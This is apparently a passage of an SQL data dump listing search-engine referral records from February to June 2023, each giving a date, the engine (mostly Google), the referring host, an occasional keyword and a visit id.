(1264,'2023-02-16','google','www.google.com','',28981),
(1265,'2023-02-16','google','www.google.com','',28994),
(1266,'2023-02-17','google','www.google.com','',29023),
(1267,'2023-02-18','google','www.google.com','',29072),
(1268,'2023-02-19','google','www.google.com','',29089),
(1269,'2023-02-19','google','www.google.com','',29090),
(1270,'2023-02-19','google','www.google.com','',29103),
(1271,'2023-02-19','google','www.google.com','',29104),
(1272,'2023-02-20','google','www.google.com','',29129),
(1273,'2023-02-20','google','www.google.com','',29140),
(1274,'2023-02-20','google','www.google.com','',29140),
(1275,'2023-02-20','google','www.google.com','',29144),
(1276,'2023-02-21','google','www.google.com','',29157),
(1277,'2023-02-25','google','www.google.com','',29283),
(1278,'2023-02-26','google','www.google.com','',29301),
(1279,'2023-02-26','google','www.google.com','',29302),
(1280,'2023-02-26','google','www.google.com','',29303),
(1281,'2023-02-26','google','www.google.com','',29304),
(1282,'2023-02-26','google','www.google.com','',29303),
(1283,'2023-02-26','google','www.google.com','',29303),
(1284,'2023-02-26','google','www.google.com','',29303),
(1285,'2023-02-26','google','www.google.com','',29303),
(1286,'2023-02-26','google','www.google.com','',29303),
(1287,'2023-02-28','google','www.google.com.hk','',29375),
(1288,'2023-02-28','google','www.google.com','',29388),
(1289,'2023-02-28','google','www.google.com','',29388),
(1290,'2023-02-28','google','www.google.com.hk','',29375),
(1291,'2023-02-28','google','www.google.com.hk','',29375),
(1292,'2023-03-02','google','www.google.com','',29449),
(1293,'2023-03-02','google','www.google.com.hk','',29468),
(1294,'2023-03-04','google','www.google.com','',29587),
(1295,'2023-03-04','google','www.google.com','',29587),
(1296,'2023-03-04','google','www.google.com','',29587),
(1297,'2023-03-04','google','www.google.com','',29587),
(1298,'2023-03-04','google','www.google.com','',29587),
(1299,'2023-03-04','google','www.google.com','',29587),
(1300,'2023-03-04','google','www.google.com','',29587),
(1301,'2023-03-04','google','www.google.com','',29587),
(1302,'2023-03-04','google','www.google.com','',29587),
(1303,'2023-03-04','google','www.google.com','',29587),
(1304,'2023-03-04','google','www.google.com','',29587),
(1305,'2023-03-04','google','www.google.com','',29587),
(1306,'2023-03-04','google','www.google.com','',29587),
(1307,'2023-03-04','google','www.google.com','',29587),
(1308,'2023-03-04','google','www.google.com','',29587),
(1309,'2023-03-04','google','www.google.com','',29587),
(1310,'2023-03-04','google','www.google.com','',29587),
(1311,'2023-03-04','google','www.google.com','',29587),
(1312,'2023-03-04','google','www.google.com','',29587),
(1313,'2023-03-04','google','www.google.com','',29587),
(1314,'2023-03-04','google','www.google.com','',29587),
(1315,'2023-03-04','google','www.google.com','',29587),
(1316,'2023-03-04','google','www.google.com','',29587),
(1317,'2023-03-04','google','www.google.com','',29587),
(1318,'2023-03-04','google','www.google.com','',29587),
(1319,'2023-03-04','google','www.google.com','',29587),
(1320,'2023-03-04','google','www.google.com','',29587),
(1321,'2023-03-04','google','www.google.com','',29587),
(1322,'2023-03-04','google','www.google.com','',29587),
(1323,'2023-03-04','google','www.google.com','',29587),
(1324,'2023-03-04','google','www.google.com','',29587),
(1325,'2023-03-04','google','www.google.com','',29587),
(1326,'2023-03-04','google','www.google.com','',29587),
(1327,'2023-03-04','google','www.google.com','',29587),
(1328,'2023-03-04','google','www.google.com','',29587),
(1329,'2023-03-04','google','www.google.com','',29587),
(1330,'2023-03-04','google','www.google.com','',29587),
(1331,'2023-03-04','google','www.google.com','',29587),
(1332,'2023-03-04','google','www.google.com','',29587),
(1333,'2023-03-04','google','www.google.com','',29587),
(1334,'2023-03-04','google','www.google.com','',29587),
(1335,'2023-03-04','google','www.google.com','',29587),
(1336,'2023-03-04','google','www.google.com','',29587),
(1337,'2023-03-04','google','www.google.com','',29587),
(1338,'2023-03-04','google','www.google.com','',29587),
(1339,'2023-03-04','google','www.google.com','',29587),
(1340,'2023-03-04','google','www.google.com','',29587),
(1341,'2023-03-04','google','www.google.com','',29587),
(1342,'2023-03-04','google','www.google.com','',29587),
(1343,'2023-03-04','google','www.google.com','',29587),
(1344,'2023-03-04','google','www.google.com','',29587),
(1345,'2023-03-04','google','www.google.com','',29587),
(1346,'2023-03-04','google','www.google.com','',29587),
(1347,'2023-03-04','google','www.google.com','',29587),
(1348,'2023-03-04','google','www.google.com','',29587),
(1349,'2023-03-04','google','www.google.com','',29587),
(1350,'2023-03-04','google','www.google.com','',29587),
(1351,'2023-03-04','google','www.google.com','',29587),
(1352,'2023-03-04','google','www.google.com','',29587),
(1353,'2023-03-04','google','www.google.com','',29587),
(1354,'2023-03-04','google','www.google.com','',29587),
(1355,'2023-03-04','google','www.google.com','',29587),
(1356,'2023-03-04','google','www.google.com','',29587),
(1357,'2023-03-04','google','www.google.com','',29587),
(1358,'2023-03-04','google','www.google.com','',29587),
(1359,'2023-03-04','google','www.google.com','',29587),
(1360,'2023-03-04','google','www.google.com','',29587),
(1361,'2023-03-04','google','www.google.com','',29587),
(1362,'2023-03-04','google','www.google.com','',29587),
(1363,'2023-03-04','google','www.google.com','',29587),
(1364,'2023-03-04','google','www.google.com','',29587),
(1365,'2023-03-04','google','www.google.com','',29587),
(1366,'2023-03-04','google','www.google.com','',29587),
(1367,'2023-03-04','google','www.google.com','',29587),
(1368,'2023-03-04','google','www.google.com','',29587),
(1369,'2023-03-04','google','www.google.com','',29587),
(1370,'2023-03-04','google','www.google.com','',29587),
(1371,'2023-03-04','google','www.google.com','',29587),
(1372,'2023-03-04','google','www.google.com','',29587),
(1373,'2023-03-04','google','www.google.com','',29587),
(1374,'2023-03-04','google','www.google.com','',29587),
(1375,'2023-03-04','google','www.google.com','',29587),
(1376,'2023-03-04','google','www.google.com','',29587),
(1377,'2023-03-04','google','www.google.com','',29587),
(1378,'2023-03-04','google','www.google.com','',29587),
(1379,'2023-03-04','google','www.google.com','',29587),
(1380,'2023-03-04','google','www.google.com','',29587),
(1381,'2023-03-04','google','www.google.com','',29587),
(1382,'2023-03-04','google','www.google.com','',29587),
(1383,'2023-03-04','google','www.google.com','',29587),
(1384,'2023-03-04','google','www.google.com','',29587),
(1385,'2023-03-04','google','www.google.com','',29587),
(1386,'2023-03-04','google','www.google.com','',29587),
(1387,'2023-03-04','google','www.google.com','',29587),
(1388,'2023-03-04','google','www.google.com','',29587),
(1389,'2023-03-04','google','www.google.com','',29587),
(1390,'2023-03-04','google','www.google.com','',29587),
(1391,'2023-03-04','google','www.google.com','',29587),
(1392,'2023-03-04','google','www.google.com','',29587),
(1393,'2023-03-04','google','www.google.com','',29587),
(1394,'2023-03-04','google','www.google.com','',29587),
(1395,'2023-03-04','google','www.google.com','',29587),
(1396,'2023-03-04','google','www.google.com','',29587),
(1397,'2023-03-04','google','www.google.com','',29587),
(1398,'2023-03-04','google','www.google.com','',29587),
(1399,'2023-03-04','google','www.google.com','',29587),
(1400,'2023-03-04','google','www.google.com','',29587),
(1401,'2023-03-04','google','www.google.com','',29587),
(1402,'2023-03-04','google','www.google.com','',29587),
(1403,'2023-03-04','google','www.google.com','',29587),
(1404,'2023-03-04','google','www.google.com','',29587),
(1405,'2023-03-04','google','www.google.com','',29587),
(1406,'2023-03-04','google','www.google.com','',29587),
(1407,'2023-03-04','google','www.google.com','',29587),
(1408,'2023-03-04','google','www.google.com','',29587),
(1409,'2023-03-04','google','www.google.com','',29587),
(1410,'2023-03-04','google','www.google.com','',29587),
(1411,'2023-03-04','google','www.google.com','',29587),
(1412,'2023-03-04','google','www.google.com','',29587),
(1413,'2023-03-04','google','www.google.com','',29587),
(1414,'2023-03-04','google','www.google.com','',29587),
(1415,'2023-03-04','google','www.google.com','',29587),
(1416,'2023-03-04','google','www.google.com','',29587),
(1417,'2023-03-04','google','www.google.com','',29587),
(1418,'2023-03-04','google','www.google.com','',29587),
(1419,'2023-03-04','google','www.google.com','',29587),
(1420,'2023-03-04','google','www.google.com','',29587),
(1421,'2023-03-04','google','www.google.com','',29587),
(1422,'2023-03-04','google','www.google.com','',29587),
(1423,'2023-03-04','google','www.google.com','',29587),
(1424,'2023-03-04','google','www.google.com','',29587),
(1425,'2023-03-04','google','www.google.com','',29587),
(1426,'2023-03-04','google','www.google.com','',29587),
(1427,'2023-03-04','google','www.google.com','',29587),
(1428,'2023-03-04','google','www.google.com','',29587),
(1429,'2023-03-04','google','www.google.com','',29587),
(1430,'2023-03-04','google','www.google.com','',29587),
(1431,'2023-03-04','google','www.google.com','',29587),
(1432,'2023-03-04','google','www.google.com','',29587),
(1433,'2023-03-04','google','www.google.com','',29587),
(1434,'2023-03-04','google','www.google.com','',29587),
(1435,'2023-03-04','google','www.google.com','',29587),
(1436,'2023-03-04','google','www.google.com','',29587),
(1437,'2023-03-04','google','www.google.com','',29587),
(1438,'2023-03-04','google','www.google.com','',29587),
(1439,'2023-03-04','google','www.google.com','',29587),
(1440,'2023-03-04','google','www.google.com','',29587),
(1441,'2023-03-04','google','www.google.com','',29587),
(1442,'2023-03-04','google','www.google.com','',29587),
(1443,'2023-03-04','google','www.google.com','',29587),
(1444,'2023-03-04','google','www.google.com','',29587),
(1445,'2023-03-04','google','www.google.com','',29587),
(1446,'2023-03-04','google','www.google.com','',29587),
(1447,'2023-03-04','google','www.google.com','',29587),
(1448,'2023-03-04','google','www.google.com','',29587),
(1449,'2023-03-04','google','www.google.com','',29587),
(1450,'2023-03-04','google','www.google.com','',29587),
(1451,'2023-03-04','google','www.google.com','',29587),
(1452,'2023-03-04','google','www.google.com','',29587),
(1453,'2023-03-04','google','www.google.com','',29587),
(1454,'2023-03-04','google','www.google.com','',29587),
(1455,'2023-03-04','google','www.google.com','',29587),
(1456,'2023-03-04','google','www.google.com','',29587),
(1457,'2023-03-04','google','www.google.com','',29587),
(1458,'2023-03-04','google','www.google.com','',29587),
(1459,'2023-03-04','google','www.google.com','',29587),
(1460,'2023-03-04','google','www.google.com','',29587),
(1461,'2023-03-04','google','www.google.com','',29587),
(1462,'2023-03-04','google','www.google.com','',29587),
(1463,'2023-03-04','google','www.google.com','',29587),
(1464,'2023-03-04','google','www.google.com','',29587),
(1465,'2023-03-04','google','www.google.com','',29587),
(1466,'2023-03-04','google','www.google.com','',29587),
(1467,'2023-03-04','google','www.google.com','',29587),
(1468,'2023-03-04','google','www.google.com','',29587),
(1469,'2023-03-04','google','www.google.com','',29587),
(1470,'2023-03-04','google','www.google.com','',29587),
(1471,'2023-03-04','google','www.google.com','',29587),
(1472,'2023-03-04','google','www.google.com','',29587),
(1473,'2023-03-04','google','www.google.com','',29587),
(1474,'2023-03-04','google','www.google.com','',29587),
(1475,'2023-03-04','google','www.google.com','',29587),
(1476,'2023-03-04','google','www.google.com','',29587),
(1477,'2023-03-04','google','www.google.com','',29587),
(1478,'2023-03-04','google','www.google.com','',29587),
(1479,'2023-03-04','google','www.google.com','',29587),
(1480,'2023-03-04','google','www.google.com','',29587),
(1481,'2023-03-04','google','www.google.com','',29587),
(1482,'2023-03-04','google','www.google.com','',29587),
(1483,'2023-03-04','google','www.google.com','',29587),
(1484,'2023-03-04','google','www.google.com','',29587),
(1485,'2023-03-04','google','www.google.com','',29587),
(1486,'2023-03-04','google','www.google.com','',29587),
(1487,'2023-03-04','google','www.google.com','',29587),
(1488,'2023-03-04','google','www.google.com','',29587),
(1489,'2023-03-04','google','www.google.com','',29587),
(1490,'2023-03-04','google','www.google.com','',29587),
(1491,'2023-03-04','google','www.google.com','',29587),
(1492,'2023-03-04','google','www.google.com','',29587),
(1493,'2023-03-04','google','www.google.com','',29587),
(1494,'2023-03-04','google','www.google.com','',29587),
(1495,'2023-03-04','google','www.google.com','',29587),
(1496,'2023-03-04','google','www.google.com','',29587),
(1497,'2023-03-04','google','www.google.com','',29587),
(1498,'2023-03-04','google','www.google.com','',29587),
(1499,'2023-03-04','google','www.google.com','',29587),
(1500,'2023-03-04','google','www.google.com','',29587),
(1501,'2023-03-04','google','www.google.com','',29587),
(1502,'2023-03-04','google','www.google.com','',29587),
(1503,'2023-03-04','google','www.google.com','',29587),
(1504,'2023-03-04','google','www.google.com','',29587),
(1505,'2023-03-04','google','www.google.com','',29587),
(1506,'2023-03-04','google','www.google.com','',29587),
(1507,'2023-03-04','google','www.google.com','',29587),
(1508,'2023-03-04','google','www.google.com','',29587),
(1509,'2023-03-04','google','www.google.com','',29587),
(1510,'2023-03-04','google','www.google.com','',29587),
(1511,'2023-03-04','google','www.google.com','',29587),
(1512,'2023-03-04','google','www.google.com','',29587),
(1513,'2023-03-04','google','www.google.com','',29587),
(1514,'2023-03-04','google','www.google.com','',29587),
(1515,'2023-03-04','google','www.google.com','',29587),
(1516,'2023-03-04','google','www.google.com','',29587),
(1517,'2023-03-04','google','www.google.com','',29587),
(1518,'2023-03-04','google','www.google.com','',29587),
(1519,'2023-03-04','google','www.google.com','',29587),
(1520,'2023-03-04','google','www.google.com','',29587),
(1521,'2023-03-04','google','www.google.com','',29587),
(1522,'2023-03-04','google','www.google.com','',29587),
(1523,'2023-03-04','google','www.google.com','',29587),
(1524,'2023-03-04','google','www.google.com','',29587),
(1525,'2023-03-04','google','www.google.com','',29587),
(1526,'2023-03-04','google','www.google.com','',29587),
(1527,'2023-03-04','google','www.google.com','',29587),
(1528,'2023-03-04','google','www.google.com','',29587),
(1529,'2023-03-04','google','www.google.com','',29587),
(1530,'2023-03-04','google','www.google.com','',29587),
(1531,'2023-03-04','google','www.google.com','',29587),
(1532,'2023-03-04','google','www.google.com','',29587),
(1533,'2023-03-04','google','www.google.com','',29587),
(1534,'2023-03-04','google','www.google.com','',29587),
(1535,'2023-03-04','google','www.google.com','',29587),
(1536,'2023-03-04','google','www.google.com','',29587),
(1537,'2023-03-04','google','www.google.com','',29587),
(1538,'2023-03-04','google','www.google.com','',29587),
(1539,'2023-03-04','google','www.google.com','',29587),
(1540,'2023-03-04','google','www.google.com','',29587),
(1541,'2023-03-04','google','www.google.com','',29587),
(1542,'2023-03-04','google','www.google.com','',29587),
(1543,'2023-03-04','google','www.google.com','',29587),
(1544,'2023-03-04','google','www.google.com','',29587),
(1545,'2023-03-04','google','www.google.com','',29587),
(1546,'2023-03-04','google','www.google.com','',29587),
(1547,'2023-03-04','google','www.google.com','',29587),
(1548,'2023-03-04','google','www.google.com','',29587),
(1549,'2023-03-04','google','www.google.com','',29587),
(1550,'2023-03-04','google','www.google.com','',29587),
(1551,'2023-03-04','google','www.google.com','',29587),
(1552,'2023-03-04','google','www.google.com','',29587),
(1553,'2023-03-04','google','www.google.com','',29587),
(1554,'2023-03-04','google','www.google.com','',29587),
(1555,'2023-03-04','google','www.google.com','',29587),
(1556,'2023-03-04','google','www.google.com','',29587),
(1557,'2023-03-04','google','www.google.com','',29587),
(1558,'2023-03-04','google','www.google.com','',29587),
(1559,'2023-03-04','google','www.google.com','',29587),
(1560,'2023-03-04','google','www.google.com','',29587),
(1561,'2023-03-04','google','www.google.com','',29587),
(1562,'2023-03-04','google','www.google.com','',29587),
(1563,'2023-03-04','google','www.google.com','',29587),
(1564,'2023-03-04','google','www.google.com','',29587),
(1565,'2023-03-04','google','www.google.com','',29587),
(1566,'2023-03-04','google','www.google.com','',29587),
(1567,'2023-03-04','google','www.google.com','',29587),
(1568,'2023-03-04','google','www.google.com','',29587),
(1569,'2023-03-04','google','www.google.com','',29587),
(1570,'2023-03-04','google','www.google.com','',29587),
(1571,'2023-03-04','google','www.google.com','',29587),
(1572,'2023-03-04','google','www.google.com','',29587),
(1573,'2023-03-04','google','www.google.com','',29587),
(1574,'2023-03-04','google','www.google.com','',29587),
(1575,'2023-03-04','google','www.google.com','',29587),
(1576,'2023-03-04','google','www.google.com','',29587),
(1577,'2023-03-04','google','www.google.com','',29587),
(1578,'2023-03-06','google','www.google.com','',29686),
(1579,'2023-03-07','google','www.google.com','',29721),
(1580,'2023-03-08','google','www.google.com','',29783),
(1581,'2023-03-08','bing','www.bing.com','',29798),
(1582,'2023-03-08','google','www.google.com','',29807),
(1583,'2023-03-08','google','www.google.com','',29808),
(1584,'2023-03-08','google','www.google.com','',29809),
(1585,'2023-03-08','google','www.google.com','',29810),
(1586,'2023-03-08','google','www.google.com','',29810),
(1587,'2023-03-08','google','www.google.com','',29810),
(1588,'2023-03-08','google','www.google.com','',29810),
(1589,'2023-03-09','google','www.google.com','',29843),
(1590,'2023-03-14','google','www.google.com.hk','',30070),
(1591,'2023-03-14','google','www.google.com.hk','',30070),
(1592,'2023-03-14','google','www.google.com.hk','',30070),
(1593,'2023-03-16','google','www.google.com','',30135),
(1594,'2023-03-29','google','www.google.com','ictbank.ir',30765),
(1595,'2023-03-29','google','www.google.com','ictbank.ir',30766),
(1596,'2023-03-29','google','www.google.com','neginghavami.ir',30767),
(1597,'2023-03-29','google','www.google.com','neginghavami.ir',30768),
(1598,'2023-03-31','google','www.google.com','',30858),
(1599,'2023-03-31','google','www.google.com','',30859),
(1600,'2023-03-31','google','www.google.com','',30860),
(1601,'2023-03-31','google','www.google.com','',30861),
(1602,'2023-03-31','google','www.google.com','',30860),
(1603,'2023-03-31','google','www.google.com','',30862),
(1604,'2023-03-31','google','www.google.com','',30863),
(1605,'2023-03-31','google','www.google.com','',30860),
(1606,'2023-03-31','google','www.google.com','',30862),
(1607,'2023-03-31','google','www.google.com','',30863),
(1608,'2023-03-31','google','www.google.com','',30860),
(1609,'2023-03-31','google','www.google.com','',30862),
(1610,'2023-03-31','google','www.google.com','',30863),
(1611,'2023-03-31','google','www.google.com','',30860),
(1612,'2023-03-31','google','www.google.com','',30862),
(1613,'2023-03-31','google','www.google.com','',30863),
(1614,'2023-03-31','google','www.google.com','',30860),
(1615,'2023-03-31','google','www.google.com','',30862),
(1616,'2023-03-31','google','www.google.com','',30863),
(1617,'2023-03-31','google','www.google.com','',30862),
(1618,'2023-03-31','google','www.google.com','',30863),
(1619,'2023-04-01','google','www.google.com','',30899),
(1620,'2023-04-02','yandex','yandex.ru','',30931),
(1621,'2023-04-04','yandex','yandex.ru','',30991),
(1622,'2023-04-05','google','www.google.com','',31043),
(1623,'2023-04-06','duckduckgo','duckduckgo.com','',31079),
(1624,'2023-04-07','yandex','yandex.ru','',31084),
(1625,'2023-04-08','yandex','yandex.ru','',31139),
(1626,'2023-04-09','yahoo','yahoo.com','',31173),
(1627,'2023-04-09','yahoo','yahoo.com','',31173),
(1628,'2023-04-09','yahoo','yahoo.com','',31174),
(1629,'2023-04-09','yahoo','yahoo.com','',31174),
(1630,'2023-04-09','yahoo','yahoo.com','',31174),
(1631,'2023-04-09','yahoo','yahoo.com','',31174),
(1632,'2023-04-11','yandex','yandex.ru','',31296),
(1633,'2023-04-12','google','www.google.com','',31420),
(1634,'2023-04-12','google','www.google.com','',31420),
(1635,'2023-04-13','bing','www.bing.com','',31438),
(1636,'2023-04-13','bing','www.bing.com','',31438),
(1637,'2023-04-13','google','www.google.com','',31457),
(1638,'2023-04-13','google','www.google.com','',31457),
(1639,'2023-04-14','google','www.google.com','',31474),
(1640,'2023-04-14','google','www.google.com','',31474),
(1641,'2023-04-15','google','www.google.com','',31530),
(1642,'2023-04-15','google','www.google.com','',31530),
(1643,'2023-04-15','google','www.google.com','',31530),
(1644,'2023-04-15','google','www.google.com','',31530),
(1645,'2023-04-15','google','www.google.com','',31557),
(1646,'2023-04-16','google','www.google.com','',31572),
(1647,'2023-04-17','google','www.google.com.hk','',31601),
(1648,'2023-04-17','google','www.google.com.hk','',31601),
(1649,'2023-04-19','google','www.google.com','',31684),
(1650,'2023-04-19','google','www.google.com','',31684),
(1651,'2023-04-19','google','www.google.com','',31684),
(1652,'2023-04-19','google','www.google.com','',31684),
(1653,'2023-04-19','google','www.google.com','',31684),
(1654,'2023-04-19','google','www.google.com','',31684),
(1655,'2023-04-19','google','www.google.com','',31684),
(1656,'2023-04-19','google','www.google.com','',31684),
(1657,'2023-04-19','google','www.google.com','',31684),
(1658,'2023-04-19','google','www.google.com','',31684),
(1659,'2023-04-19','google','www.google.com','',31684),
(1660,'2023-04-19','google','www.google.com','',31684),
(1661,'2023-04-19','google','www.google.com','',31684),
(1662,'2023-04-19','google','www.google.com','',31684),
(1663,'2023-04-19','google','www.google.com','',31684),
(1664,'2023-04-19','google','www.google.com','',31684),
(1665,'2023-04-19','google','www.google.com','',31684),
(1666,'2023-04-19','google','www.google.com','',31684),
(1667,'2023-04-19','google','www.google.com','',31684),
(1668,'2023-04-19','google','www.google.com','',31684),
(1669,'2023-04-19','google','www.google.com','',31684),
(1670,'2023-04-19','google','www.google.com','',31684),
(1671,'2023-04-19','google','www.google.com','',31684),
(1672,'2023-04-19','google','www.google.com','',31684),
(1673,'2023-04-19','google','www.google.com','',31684),
(1674,'2023-04-19','google','www.google.com','',31684),
(1675,'2023-04-19','google','www.google.com','',31684),
(1676,'2023-04-19','google','www.google.com','',31684),
(1677,'2023-04-19','google','www.google.com','',31684),
(1678,'2023-04-19','google','www.google.com','',31684),
(1679,'2023-04-19','google','www.google.com','',31684),
(1680,'2023-04-19','google','www.google.com','',31684),
(1681,'2023-04-19','google','www.google.com','',31684),
(1682,'2023-04-19','google','www.google.com','',31684),
(1683,'2023-04-19','google','www.google.com','',31688),
(1684,'2023-04-19','google','www.google.com','',31688),
(1685,'2023-04-19','google','www.google.com','',31688),
(1686,'2023-04-19','google','www.google.com','',31688),
(1687,'2023-04-19','google','www.google.com','',31688),
(1688,'2023-04-19','google','www.google.com','',31688),
(1689,'2023-04-19','google','www.google.com','',31688),
(1690,'2023-04-19','google','www.google.com','',31688),
(1691,'2023-04-19','google','www.google.com','',31688),
(1692,'2023-04-19','google','www.google.com','',31688),
(1693,'2023-04-19','google','www.google.com','',31688),
(1694,'2023-04-19','google','www.google.com','',31688),
(1695,'2023-04-19','google','www.google.com','',31688),
(1696,'2023-04-19','google','www.google.com','',31688),
(1697,'2023-04-19','google','www.google.com','',31688),
(1698,'2023-04-19','google','www.google.com','',31688),
(1699,'2023-04-19','google','www.google.com','',31688),
(1700,'2023-04-19','google','www.google.com','',31688),
(1701,'2023-04-19','google','www.google.com','',31688),
(1702,'2023-04-19','google','www.google.com','',31688),
(1703,'2023-04-19','google','www.google.com','',31688),
(1704,'2023-04-19','google','www.google.com','',31688),
(1705,'2023-04-19','google','www.google.com','',31688),
(1706,'2023-04-19','google','www.google.com','',31688),
(1707,'2023-04-19','google','www.google.com','',31688),
(1708,'2023-04-19','google','www.google.com','',31688),
(1709,'2023-04-19','google','www.google.com','',31688),
(1710,'2023-04-19','google','www.google.com','',31688),
(1711,'2023-04-19','google','www.google.com','',31688),
(1712,'2023-04-19','google','www.google.com','',31688),
(1713,'2023-04-19','google','www.google.com','',31688),
(1714,'2023-04-19','google','www.google.com','',31688),
(1715,'2023-04-19','google','www.google.com','',31688),
(1716,'2023-04-19','google','www.google.com','',31688),
(1717,'2023-04-20','google','www.google.com','',31733),
(1718,'2023-04-22','google','www.google.com','',31789),
(1719,'2023-04-24','google','www.google.com','',31856),
(1720,'2023-04-24','google','www.google.com','',31859),
(1721,'2023-04-24','google','www.google.com','',31860),
(1722,'2023-04-24','google','www.google.com','',31860),
(1723,'2023-04-24','google','www.google.com','',31861),
(1724,'2023-04-25','google','www.google.com','',31910),
(1725,'2023-04-28','google','www.google.com','',32028),
(1726,'2023-04-30','google','www.google.com','',32080),
(1727,'2023-04-30','google','www.google.com','',32083),
(1728,'2023-05-01','google','www.google.com','',32108),
(1729,'2023-05-01','google','www.google.com','',32108),
(1730,'2023-05-01','google','www.google.com','',32143),
(1731,'2023-05-02','google','www.google.com','',32150),
(1732,'2023-05-02','yandex','yandex.ru','',32162),
(1733,'2023-05-02','google','www.google.com','',32177),
(1734,'2023-05-04','google','www.google.com','',32238),
(1735,'2023-05-04','google','www.google.com','',32239),
(1736,'2023-05-04','google','www.google.com','',32240),
(1737,'2023-05-04','google','www.google.com','',32241),
(1738,'2023-05-04','google','www.google.com','',32242),
(1739,'2023-05-04','google','www.google.com','',32241),
(1740,'2023-05-04','google','www.google.com','',32242),
(1741,'2023-05-04','google','www.google.com','',32241),
(1742,'2023-05-04','google','www.google.com','',32242),
(1743,'2023-05-04','google','www.google.com','',32241),
(1744,'2023-05-04','google','www.google.com','',32242),
(1745,'2023-05-04','google','www.google.com','',32241),
(1746,'2023-05-06','google','www.google.com','',32348),
(1747,'2023-05-08','google','www.google.com','',32417),
(1748,'2023-05-08','google','www.google.com','',32417),
(1749,'2023-05-09','google','www.google.com','',32446),
(1750,'2023-05-14','google','www.google.com','',32686),
(1751,'2023-05-14','google','www.google.com','',32687),
(1752,'2023-05-14','google','www.google.com','',32688),
(1753,'2023-05-14','google','www.google.com','',32689),
(1754,'2023-05-14','google','www.google.com','',32687),
(1755,'2023-05-14','google','www.google.com','',32690),
(1756,'2023-05-14','google','www.google.com','',32687),
(1757,'2023-05-14','google','www.google.com','',32691),
(1758,'2023-05-14','google','www.google.com','',32687),
(1759,'2023-05-14','google','www.google.com','',32692),
(1760,'2023-05-14','google','www.google.com','',32692),
(1761,'2023-05-14','google','www.google.com','',32687),
(1762,'2023-05-14','google','www.google.com','',32693),
(1763,'2023-05-14','google','www.google.com','',32694),
(1764,'2023-05-14','google','www.google.com','',32695),
(1765,'2023-05-14','google','www.google.com','',32696),
(1766,'2023-05-14','google','www.google.com','',32696),
(1767,'2023-05-14','google','www.google.com','',32697),
(1768,'2023-05-14','google','www.google.com','',32699),
(1769,'2023-05-14','google','www.google.com','',32699),
(1770,'2023-05-14','google','www.google.com','',32701),
(1771,'2023-05-16','google','www.google.com','',32774),
(1772,'2023-05-16','google','www.google.com','',32785),
(1773,'2023-05-16','google','www.google.com','',32804),
(1774,'2023-05-18','google','www.google.com','',32907),
(1775,'2023-05-18','google','www.google.com','',32915),
(1776,'2023-05-18','google','www.google.com','',32915),
(1777,'2023-05-20','google','www.google.com','',33056),
(1778,'2023-05-20','google','www.google.com','',33060),
(1779,'2023-05-21','google','www.google.com','',33077),
(1780,'2023-05-23','google','www.google.com','',33182),
(1781,'2023-05-23','google','www.google.com','',33182),
(1782,'2023-05-24','google','www.google.com','',33208),
(1783,'2023-05-24','google','www.google.com','',33235),
(1784,'2023-05-30','yandex','yandex.ru','',33491),
(1785,'2023-05-30','yandex','yandex.ru','',33496),
(1786,'2023-05-30','google','www.google.com','',33504),
(1787,'2023-05-30','google','www.google.com','',33506),
(1788,'2023-05-30','google','www.google.com','',33508),
(1789,'2023-05-31','google','www.google.com','',33554),
(1790,'2023-06-01','google','www.google.com','',33627),
(1791,'2023-06-02','google','www.google.com','',33658),
(1792,'2023-06-02','google','www.google.com','',33658),
(1793,'2023-06-02','google','www.google.com','',33683),
(1794,'2023-06-02','google','docs.google.com','',33688),
(1795,'2023-06-03','google','www.google.com','',33728),
(1796,'2023-06-04','google','www.google.com','',33762),
(1797,'2023-06-04','google','www.google.com','',33763),
(1798,'2023-06-04','google','www.google.com','',33764),
(1799,'2023-06-04','google','www.google.com','',33765),
(1800,'2023-06-04','google','www.google.com','',33763),
(1801,'2023-06-04','google','www.google.com','',33763),
(1802,'2023-06-04','google','www.google.com','',33766),
(1803,'2023-06-04','google','www.google.com','',33763),
(1804,'2023-06-04','google','www.google.com','',33763),
(1805,'2023-06-04','google','www.google.com','',33763),
(1806,'2023-06-04','google','www.google.com','',33767),
(1807,'2023-06-04','google','www.google.com','',33768),
(1808,'2023-06-04','google','www.google.com','',33767),
(1809,'2023-06-04','google','www.google.com','',33768),
(1810,'2023-06-04','google','www.google.com','',33769),
(1811,'2023-06-04','google','www.google.com','',33768),
(1812,'2023-06-04','google','www.google.com','',33769),
(1813,'2023-06-04','google','www.google.com','',33768),
(1814,'2023-06-04','google','www.google.com','',33769),
(1815,'2023-06-04','google','www.google.com','',33768),
(1816,'2023-06-05','google','www.google.com','',33808),
(1817,'2023-06-05','google','www.google.com','',33808),
(1818,'2023-06-05','google','www.google.com','',33827),
(1819,'2023-06-06','google','www.google.com','',33873),
(1820,'2023-06-08','google','www.google.com','',33976),
(1821,'2023-06-09','google','www.google.com','',34047),
(1822,'2023-06-09','google','www.google.com','',34047),
(1823,'2023-06-10','google','www.google.com','',34054),
(1824,'2023-06-10','google','www.google.com','',34054),
(1825,'2023-06-10','google','www.google.com','',34058),
(1826,'2023-06-10','google','www.google.com','',34058),
(1827,'2023-06-12','google','www.google.com','',34180),
(1828,'2023-06-13','google','www.google.com','',34215),
(1829,'2023-06-13','google','www.google.com','',34216),
(1830,'2023-06-13','google','www.google.com','',34215),
(1831,'2023-06-13','google','www.google.com','',34218),
(1832,'2023-06-14','google','www.google.com','',34242),
(1833,'2023-06-14','duckduckgo','duckduckgo.com','',34271),
(1834,'2023-06-15','google','www.google.com','',34304),
(1835,'2023-06-15','google','www.google.com','',34304),
(1836,'2023-06-16','google','www.google.com','',34399),
(1837,'2023-06-18','google','www.google.com','',34481),
(1838,'2023-06-20','google','www.google.com','',34588),
(1839,'2023-06-20','google','www.google.com','',34626),
(1840,'2023-06-22','google','www.google.com','',34733),
(1841,'2023-06-22','google','www.google.de','',34736),
(1842,'2023-06-23','google','www.google.com','',34748),
(1843,'2023-06-23','google','www.google.com','',34787),
(1844,'2023-06-23','google','www.google.com','',34788),
(1845,'2023-06-23','google','www.google.com','',34789),
(1846,'2023-06-23','google','www.google.com','',34790),
(1847,'2023-06-23','google','www.google.com','',34791),
(1848,'2023-06-23','google','www.google.com','',34792),
(1849,'2023-06-23','google','www.google.com','',34791),
(1850,'2023-06-23','google','www.google.com','',34793),
(1851,'2023-06-23','google','www.google.com','',34791),
(1852,'2023-06-23','google','www.google.com','',34794),
(1853,'2023-06-23','google','www.google.com','',34795),
(1854,'2023-06-23','google','www.google.com','',34789),
(1855,'2023-06-23','google','www.google.com','',34796),
(1856,'2023-06-24','google','www.google.com.hk','',34844),
(1857,'2023-06-27','google','www.google.com','',34962),
